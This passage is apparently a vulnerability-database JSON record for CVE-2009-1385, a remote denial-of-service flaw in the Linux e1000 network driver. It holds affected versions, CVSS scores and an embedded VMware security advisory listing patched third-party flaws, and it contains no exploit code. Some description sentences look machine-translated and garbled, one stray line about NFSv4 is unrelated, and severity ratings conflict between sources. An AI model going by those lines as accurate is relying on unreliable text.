                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24_rc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:7.2.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:rc7-git6:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.30",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:linux:kernel:2.6.24.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:6.0.54:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:6.1.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:6.2.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29:rc2_git7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.3:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23_rc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.rc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.5:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22_rc7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24_rc5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:linux:kernel:2.6.25.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.2.52:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.36.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:5.2.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:7.1.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.rc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22_rc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29.rc2-git1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.30:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.26.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.29:git1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:7.2.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:intel:e1000:6.0.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.25.10:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Neil Horman",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2009-1385",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2009-1385",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-38831",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2009-1385",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200906-053",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-38831",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2009-1385",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38831"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-1385"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel before 2.6.30-rc8, the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size. (DoS) There is a vulnerability that becomes a condition.Denial of service due to crafted frame size (DoS) There is a possibility of being put into a state. The NFSv4 implementation is one of the distributed file system protocols. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- -----------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2009-0016\nSynopsis:          VMware vCenter and ESX update release and vMA patch\n                   release address multiple security issue in third\n                   party components\nIssue date:        2009-11-20\nUpdated on:        2009-11-20 (initial release of advisory)\nCVE numbers:       --- JRE ---\n                   CVE-2009-1093 CVE-2009-1094 CVE-2009-1095\n                   CVE-2009-1096 CVE-2009-1097 CVE-2009-1098\n                   CVE-2009-1099 CVE-2009-1100 CVE-2009-1101\n                   CVE-2009-1102 CVE-2009-1103 CVE-2009-1104\n                   CVE-2009-1105 CVE-2009-1106 CVE-2009-1107\n                   CVE-2009-2625 CVE-2009-2670 CVE-2009-2671\n                   CVE-2009-2672 CVE-2009-2673 CVE-2009-2675\n                   CVE-2009-2676 CVE-2009-2716 CVE-2009-2718\n                   CVE-2009-2719 CVE-2009-2720 CVE-2009-2721\n                   CVE-2009-2722 CVE-2009-2723 CVE-2009-2724\n                   --- Tomcat ---\n                   CVE-2008-5515 CVE-2009-0033 CVE-2009-0580\n                   CVE-2009-0781 CVE-2009-0783 CVE-2008-1232\n                   CVE-2008-1947 CVE-2008-2370 CVE-2007-5333\n                   CVE-2007-5342 CVE-2007-5461 CVE-2007-6286\n                   CVE-2008-0002\n                   --- ntp ---\n                   CVE-2009-1252 CVE-2009-0159\n                   --- kernel ---\n                   CVE-2008-3528 CVE-2008-5700 CVE-2009-0028\n                   CVE-2009-0269 CVE-2009-0322 CVE-2009-0675\n                   CVE-2009-0676 CVE-2009-0778 CVE-2008-4307\n                   CVE-2009-0834 CVE-2009-1337 CVE-2009-0787\n                   CVE-2009-1336 CVE-2009-1439 CVE-2009-1633\n                   CVE-2009-1072 CVE-2009-1630 CVE-2009-1192\n                   CVE-2007-5966 CVE-2009-1385 CVE-2009-1388\n                   CVE-2009-1389 CVE-2009-1895 CVE-2009-2406\n                   CVE-2009-2407 CVE-2009-2692 CVE-2009-2698\n                   CVE-2009-0745 CVE-2009-0746 CVE-2009-0747\n                   CVE-2009-0748 CVE-2009-2847 CVE-2009-2848\n                   --- python ---\n                   CVE-2007-2052 CVE-2007-4965 CVE-2008-1721\n                   CVE-2008-1887 CVE-2008-2315 CVE-2008-3142\n                   CVE-2008-3143 CVE-2008-3144 CVE-2008-4864\n                   CVE-2008-5031\n                   --- bind ---\n                   CVE-2009-0696\n                   --- libxml and libxml2 ---\n                   CVE-2009-2414 CVE-2009-2416\n                   --- curl --\n                   CVE-2009-2417\n                   --- gnutil ---\n                   CVE-2007-2052\n- -----------------------------------------------------------------------\n\n1. Summary\n\n   Updated Java JRE packages and Tomcat packages address several security\n   issues. Updates for the ESX Service Console and vMA include kernel,\n   ntp, Python, bind libxml, libxml2, curl and gnutil packages. ntp is\n   also updated for ESXi userworlds. \n\n2. Relevant releases\n\n   vCenter Server 4.0 before Update 1\n\n   ESXi 4.0 without patch ESXi400-200911201-UG\n\n   ESX 4.0 without patches ESX400-200911201-UG, ESX400-200911223-UG,\n                           ESX400-200911232-SG, ESX400-200911233-SG,\n                           ESX400-200911234-SG, ESX400-200911235-SG,\n                           ESX400-200911237-SG, ESX400-200911238-SG\n\n   vMA 4.0 before patch 02\n\n3. Problem Description\n\n a. JRE Security Update\n\n    JRE update to version 1.5.0_20, which addresses multiple security\n    issues that existed in earlier releases of JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the following names to the security issues fixed in\n    JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,\n    CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099,\n    CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103,\n    CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the following names to the security issues fixed in\n    JRE 1.5.0_20: CVE-2009-2625, CVE-2009-2670, CVE-2009-2671,\n    CVE-2009-2672, CVE-2009-2673, CVE-2009-2675, CVE-2009-2676,\n    CVE-2009-2716, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720,\n    CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.0       Windows  Update 1\n    VirtualCenter  2.5       Windows  affected, patch pending\n    VirtualCenter  2.0.2     Windows  affected, patch pending\n\n    Workstation    any       any      not affected\n\n    Player         any       any      not affected\n\n    Server         2.0       any      affected, patch pending\n    Server         1.0       any      not affected\n\n    ACE            any       any      not affected\n\n    Fusion         any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-200911223-UG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 2 *\n\n  * vMA JRE is updated to version JRE 1.5.0_21\n\n    Notes: These vulnerabilities can be exploited remotely only if the\n           attacker has access to the Service Console network. \n\n           Security best practices provided by VMware recommend that the\n           Service Console be isolated from the VM network. Please see\n           http://www.vmware.com/resources/techresources/726 for more\n           information on VMware security best practices. \n\n           The currently installed version of JRE depends on your patch\n           deployment history. \n\n\n b. Update Apache Tomcat version to 6.0.20\n\n   Update for VirtualCenter and ESX patch update the Tomcat package to\n   version 6.0.20 which addresses multiple security issues that existed\n   in the previous version of Apache Tomcat. \n\n   The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n   assigned the following names to the security issues fixed in\n   Apache Tomcat 6.0.20: CVE-2008-5515, CVE-2009-0033, CVE-2009-0580,\n   CVE-2009-0781, CVE-2009-0783. \n\n   The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n   assigned the following names to the security issues fixed in\n   Apache Tomcat 6.0.18:  CVE-2008-1232, CVE-2008-1947, CVE-2008-2370. \n\n   The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n   assigned the following names to the security issues fixed in\n   Apache Tomcat 6.0.16:  CVE-2007-5333, CVE-2007-5342, CVE-2007-5461,\n   CVE-2007-6286, CVE-2008-0002. \n\n   The following table lists what action remediates the vulnerability\n   (column 4) if a solution is available. \n\n   VMware        Product   Running  Replace with/\n   Product       Version   on       Apply Patch\n   ========      ========  =======  =======================\n   vCenter       4.0       Windows  Update 1\n   VirtualCenter 2.5       Windows  affected, patch pending\n   VirtualCenter 2.0.2     Windows  affected, patch pending\n\n   Workstation   any       any      not affected\n\n   Player        any       any      not affected\n\n   ACE           any       Windows  not affected\n\n   Server        2.x       any      affected, patch pending\n   Server        1.x       any      not affected\n\n   Fusion        any       Mac OS/X not affected\n\n   ESXi          any       ESXi     not affected\n\n   ESX           4.0       ESX      ESX400-200911223-UG\n   ESX           3.5       ESX      affected, patch pending\n   ESX           3.0.3     ESX      affected, patch pending\n   ESX           2.5.5     ESX      not affected\n\n   vMA           4.0       RHEL5    not affected\n\n    Notes: These vulnerabilities can be exploited remotely only if the\n           attacker has access to the Service Console network. \n\n           Security best practices provided by VMware recommend that the\n           Service Console be isolated from the VM network. Please see\n           http://www.vmware.com/resources/techresources/726 for more\n           information on VMware security best practices. \n\n           The currently installed version of Tomcat depends on\n           your patch deployment history. \n\n c. Third party library update for ntp. \n\n   The Network Time Protocol (NTP) is used to synchronize a computer\u0027s\n   time with a referenced time source. \n\n   ESXi 3.5 and ESXi 4.0 have a ntp client that is affected by the\n   following security issue. Note that the same security issue is\n   present in the ESX Service Console as described in section d. of\n   this advisory. \n\n   A buffer overflow flaw was discovered in the ntpd daemon\u0027s NTPv4\n   authentication code. If ntpd was configured to use public key\n   cryptography for NTP packet authentication, a remote attacker could\n   use this flaw to send a specially-crafted request packet that could\n   crash ntpd or, potentially, execute arbitrary code with the\n   privileges of the \"ntp\" user. \n\n   The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n   has assigned the name CVE-2009-1252 to this issue. \n\n   The NTP security issue identified by CVE-2009-0159 is not relevant\n   for ESXi 3.5 and ESXi 4.0. \n\n   The following table lists what action remediates the vulnerability\n   in this component (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.0       ESXi     ESXi400-200911201-UG\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    not affected\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n d. Service Console update for ntp\n\n   Service Console package ntp updated to version ntp-4.2.2pl-9.el5_3.2\n\n   The Network Time Protocol (NTP) is used to synchronize a computer\u0027s\n   time with a referenced time source. \n\n   The Service Console present in ESX is affected by the following\n   security issues. \n\n   A buffer overflow flaw was discovered in the ntpd daemon\u0027s NTPv4\n   authentication code. If ntpd was configured to use public key\n   cryptography for NTP packet authentication, a remote attacker could\n   use this flaw to send a specially-crafted request packet that could\n   crash ntpd or, potentially, execute arbitrary code with the\n   privileges of the \"ntp\" user. \n\n   NTP authentication is not enabled by default on the Service Console. \n\n   The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n   has assigned the name CVE-2009-1252 to this issue. \n\n   A buffer overflow flaw was found in the ntpq diagnostic command. A\n   malicious, remote server could send a specially-crafted reply to an\n   ntpq request that could crash ntpq or, potentially, execute\n   arbitrary code with the privileges of the user running the ntpq\n   command. \n\n   The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n   has assigned the name CVE-2009-0159 to this issue. \n\n   The following table lists what action remediates the vulnerability\n   in the Service Console (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-200911238-SG\n    ESX            3.5       ESX      affected, patch pending **\n    ESX            3.0.3     ESX      affected, patch pending **\n    ESX            2.5.5     ESX      affected, patch pending **\n\n    vMA            4.0       RHEL5    Patch 2\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n  ** The service consoles of ESX 2.5.5, ESX 3.0.3 and ESX 3.5 are not\naffected\n     by CVE-2009-1252. The security issue identified by CVE-2009-0159 has a\n     low impact on the service console of ESX 2.5.5, ESX 3.0.3 and ESX 3.5. \n\n e. Updated Service Console package kernel\n\n    Updated Service Console package kernel addresses the security\n    issues below. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-3528, CVE-2008-5700, CVE-2009-0028,\n    CVE-2009-0269, CVE-2009-0322, CVE-2009-0675, CVE-2009-0676,\n    CVE-2009-0778 to the security issues fixed in kernel\n    2.6.18-128.1.6. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-4307, CVE-2009-0834, CVE-2009-1337,\n    CVE-2009-0787, CVE-2009-1336 to the security issues fixed in\n    kernel 2.6.18-128.1.10. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-1439, CVE-2009-1633, CVE-2009-1072,\n    CVE-2009-1630, CVE-2009-1192 to the security issues fixed in\n    kernel 2.6.18-128.1.14. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2007-5966, CVE-2009-1385, CVE-2009-1388,\n    CVE-2009-1389, CVE-2009-1895, CVE-2009-2406, CVE-2009-2407 to the\n    security issues fixed in kernel 2.6.18-128.4.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-2692, CVE-2009-2698 to the\n    security issues fixed in kernel 2.6.18-128.7.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-0745, CVE-2009-0746, CVE-2009-0747,\n    CVE-2009-0748, CVE-2009-2847, CVE-2009-2848 to the security issues\n    fixed in kernel 2.6.18-164. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-200911201-UG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    Patch 2 **\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n  ** vMA is updated to kernel version 2.6.18-164. \n\n f. Updated Service Console package python\n\n    Service Console package Python update to version 2.4.3-24.el5. \n\n    When the assert() system call was disabled, an input sanitization\n    flaw was revealed in the Python string object implementation that\n    led to a buffer overflow. The missing check for negative size values\n    meant the Python memory allocator could allocate less memory than\n    expected. This could result in arbitrary code execution with the\n    Python interpreter\u0027s privileges. \n\n    Multiple buffer and integer overflow flaws were found in the Python\n    Unicode string processing and in the Python Unicode and string\n    object implementations. An attacker could use these flaws to cause\n    a denial of service. \n\n    Multiple integer overflow flaws were found in the Python imageop\n    module. If a Python application used the imageop module to\n    process untrusted images, it could cause the application to\n    disclose sensitive information, crash or, potentially, execute\n    arbitrary code with the Python interpreter\u0027s privileges. \n\n    Multiple integer underflow and overflow flaws were found in the\n    Python snprintf() wrapper implementation. An attacker could use\n    these flaws to cause a denial of service (memory corruption). \n\n    Multiple integer overflow flaws were found in various Python\n    modules. An attacker could use these flaws to cause a denial of\n    service. \n\n    An integer signedness error, leading to a buffer overflow, was\n    found in the Python zlib extension module. If a Python application\n    requested the negative byte count be flushed for a decompression\n    stream, it could cause the application to crash or, potentially,\n    execute arbitrary code with the Python interpreter\u0027s privileges. \n\n    A flaw was discovered in the strxfrm() function of the Python\n    locale module. Strings generated by this function were not properly\n    NULL-terminated, which could possibly cause disclosure of data\n    stored in the memory of a Python application using this function. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2007-2052 CVE-2007-4965 CVE-2008-1721\n    CVE-2008-1887 CVE-2008-2315 CVE-2008-3142 CVE-2008-3143\n    CVE-2008-3144 CVE-2008-4864 CVE-2008-5031 to these issues. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-200911235-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch 